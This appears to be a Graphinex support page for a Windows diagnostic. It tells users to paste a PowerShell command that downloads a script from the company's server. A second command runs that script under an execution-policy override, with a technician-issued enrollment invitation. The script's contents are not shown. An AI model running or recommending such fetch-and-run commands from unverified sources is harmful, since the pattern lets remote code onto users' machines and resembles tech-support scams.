Windows diagnostic test ● Available
This is the currently verified recovery workflow. It collects basic Windows version, memory and disk information. It does not install software, change settings, or give anyone remote control.
Download Windows diagnostic script (.ps1)
Step 1 — Open Windows PowerShell (not Command Prompt). The following command downloads the current diagnostic script directly into your Downloads folder. Copy the entire line:
Invoke-WebRequest -Uri "https://recovery.graphinex.com/gnex-diagnostic-test.ps1" -OutFile "$env:USERPROFILE\Downloads\gnex-diagnostic-test.ps1"
Step 2 — Run the diagnostic. After entering the technician-issued device ID below, copy the generated command. It uses the full script path, so it works regardless of the current PowerShell folder. No administrator privileges or execution-policy changes are needed for the download.
Requires Windows PowerShell 5.1 or newer, a device ID, and a one-time enrollment invitation supplied by an authorized Graphinex technician.
A generated ID is local until registered by a technician; it is not an enrollment credential.
Open Windows PowerShell and paste this command. It requests the one-time invitation interactively instead of putting it in your shell history. The script is executed with a process-scoped policy setting, without changing the system policy.

Diagnostic gateway: Checking…
Enrollment and diagnostics use HTTPS and device-specific credentials. The legacy unattended recovery relay and older installer workflows are not being advertised while their security and reliability are reviewed.
Other platforms and advanced recovery
Linux, macOS, Android, iOS, forensic imaging, and attended remote repair are available only through technician-coordinated workflows until each installer and connection path passes validation. Contact Graphinex to arrange an authorized session.
